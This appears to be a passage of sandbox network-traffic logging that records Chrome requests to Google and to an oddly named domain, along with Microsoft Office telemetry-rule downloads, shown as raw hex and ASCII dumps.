2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 68 73 3d 7b 68 3a 74 72 75 65 2c 6e 68 73 3a 66 61 6c 73 65 2c 73 69 65 3a 66 61 6c 73 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 63 3d 7b 62 74 66 69 3a 66 61 6c 73 65 2c 63 34 74 3a 74 72 75 65 2c 63 61 Data Ascii: document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);(function(){google.hs={h:true,nhs:false,sie:false};})();(function(){google.c={btfi:false,c4t:true,ca
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 76 69 73 69 62 69 6c 69 74 79 3d 3d 3d 22 68 69 64 64 65 6e 22 7c 7c 61 2e 68 65 69 67 68 74 3d 3d 3d 22 30 70 78 22 26 26 61 2e 77 69 64 74 68 3d 3d 3d 22 30 70 78 22 29 29 3a 21 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 68 3d 65 28 61 29 2c 6b 3d 68 2e 6c 65 66 74 2b 28 63 3f 30 3a 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 29 2c 6d 3d 68 2e 74 6f 70 2b 28 63 3f 30 3a 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 29 2c 6e 3d 68 2e 77 69 64 74 68 2c 66 3d 68 2e 68 65 69 67 68 74 2c 67 3d 30 3b 69 66 28 21 62 26 26 66 3c 3d 30 26 26 6e 3c 3d 30 29 72 65 74 75 72 6e 20 67 3b 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 Data Ascii: visibility==="hidden"\|\|a.height==="0px"&&a.width==="0px")):!1}function ea(a,b,c,d,e){var h=e(a),k=h.left+(c?0:window.pageXOffset),m=h.top+(c?0:window.pageYOffset),n=h.width,f=h.height,g=0;if(!b&&f<=0&&n<=0)return g;b=window.innerHeight\|\|document.document
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 22 73 74 72 69 6e 67 22 26 26 61 7c 7c 74 68 69 73 2e 67 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 7a 79 5f 22 2c 22 31 22 29 3b 74 68 69 73 2e 42 3f 62 3d 21 30 3a 62 7c 7c 78 26 26 74 68 69 73 2e 69 7c 7c 74 68 69 73 2e 6a 7c 7c 74 68 69 73 2e 6c 3f 62 3d 21 31 3a 28 62 3d 74 68 69 73 2e 67 2e 73 72 63 2c 62 3d 74 79 70 65 6f 66 20 62 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 21 62 2c 61 3d 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 22 29 2c 62 3d 0a 61 21 3d 3d 6e 75 6c 6c 3f 61 3d 3d 3d 22 31 22 3a 62 7c 7c 74 68 69 73 2e 67 2e 63 6f 6d 70 6c 65 74 65 29 3b 74 68 69 73 2e 41 3d 62 3b 78 7c 7c 74 68 69 73 2e 41 7c 7c 74 68 69 73 2e 69 7c 7c 45 28 74 68 69 73 29 3b 77 26 26 21 63 26 26 46 28 Data Ascii: "string"&&a\|\|this.g.setAttribute("data-lzy_","1");this.B?b=!0:b\|\|x&&this.i\|\|this.j\|\|this.l?b=!1:(b=this.g.src,b=typeof b!=="string"\|\|!b,a=this.g.getAttribute("data-cmp"),b=a!==null?a==="1":b\|\|this.g.complete);this.A=b;x\|\|this.A\|\|this.i\|\|E(this);w&&!c&&F(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	49873	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:21 UTC	1006	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
2024-11-07 06:33:22 UTC	755	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 9fa0df3250da772fc9ee3727af5e935e Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:22 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: fadf1528-a01e-001e-72d2-2c49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063322Z-16547b76f7fnlcwwhC1DFWz6gw00000007yg0000000020r3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:22 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	49875	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	1006	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
2024-11-07 06:33:22 UTC	755	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 23fe85edc216d4a2837fee19a1d06900 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49879	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:22 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 14de8335-b01e-003e-77d2-2c8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063322Z-16547b76f7fp6mhthC1DFWrggn00000007v000000000at51 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:22 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49880	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 9a908836-001e-0028-5a40-2ec49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063322Z-15869dbbcc6khw88hC1DFWbb20000000016g00000000hfs4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:22 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49878	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:22 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: a0219141-901e-005b-3761-2e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063322Z-15869dbbcc6qwghvhC1DFWssds00000004700000000096z3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:22 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:22 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063322Z-16547b76f7f9bs6dhC1DFWt3rg00000007tg0000000045gn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:22 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	49877	142.250.185.132	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:22 UTC	1265	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-prefers-color-scheme: light Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
2024-11-07 06:33:22 UTC	1201	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:22 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-nAGd3s7-EU_2qQgFtMseyA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 06:33:22 UTC	177	IN	Data Raw: 32 63 62 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f Data Ascii: 2cb7<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6e 41 47 64 33 73 37 2d 45 55 5f 32 71 51 67 46 74 4d 73 65 79 41 22 3e 77 69 6e 64 6f 77 2e 5f 68 73 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6e 41 47 64 33 73 37 2d 45 55 Data Ascii: branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="nAGd3s7-EU_2qQgFtMseyA">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="nAGd3s7-EU
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 7d 72 65 74 75 72 6e 22 2f 22 2b 28 6b 7c 7c 22 67 65 6e 5f 32 30 34 22 29 2b 22 3f 61 74 79 70 3d 69 26 63 74 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 64 29 7d 3b 6d 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 71 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 6b 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 65 3b 63 7c 7c 28 63 3d 74 28 61 2c 62 2c 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b Data Ascii: }return"/"+(k\|\|"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+d)};m=google.kEI;google.getEI=p;google.getLEI=q;google.ml=function(){return null};google.log=function(a,b,c,d,k,e){e=e===void 0?l:e;c\|\|(c=t(a,b,e,d,k));if(c=r(c)){a=new Image;var g=n.length;n[
